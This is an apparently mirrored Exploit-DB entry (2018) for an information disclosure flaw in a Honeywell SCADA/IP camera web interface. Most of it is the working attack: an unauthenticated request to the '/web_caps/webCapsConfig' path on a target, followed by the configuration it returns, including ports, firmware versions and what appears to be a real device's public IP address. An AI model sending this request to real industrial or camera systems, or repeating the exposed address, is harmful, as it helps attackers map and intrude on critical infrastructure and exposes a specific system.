Honeywell Scada System – Information Disclosure

  • 作者: t4rkd3vilz
    日期: 2018-05-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44734/
  • # Exploit Title: Honeywell Scada System - Information Disclosure
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS
# Tested on: Linux

# To be written after the destination IP address /web_caps/webCapsConfig
# the downloaded file opens with the file name. The file contains
# critical information about the destination address

https://TargetIp/web_caps/webCapsConfig

# Result:

"Anonymous" : false,
 "DeviceSubClass" : "Unknown",
 "HttpPort" : {
"InnerPort" : 80
 },
 "HttpsPort" : {
"InnerPort" : 443
 },
 "NAS_Protocol_Mask" : 100,
 "PluginVersion" : "3.3.37.274972",
 "TCPPort" : 37777,
 "WebVersion" : "3.2.1.294365",
 "deviceType" : "IPC-HFW2320R-ZS",
 "eth0" : {
"IPAddress" : "36.67.33.226",
"IPv6Address" : "2001:250:3000:1::1:2"
    Bash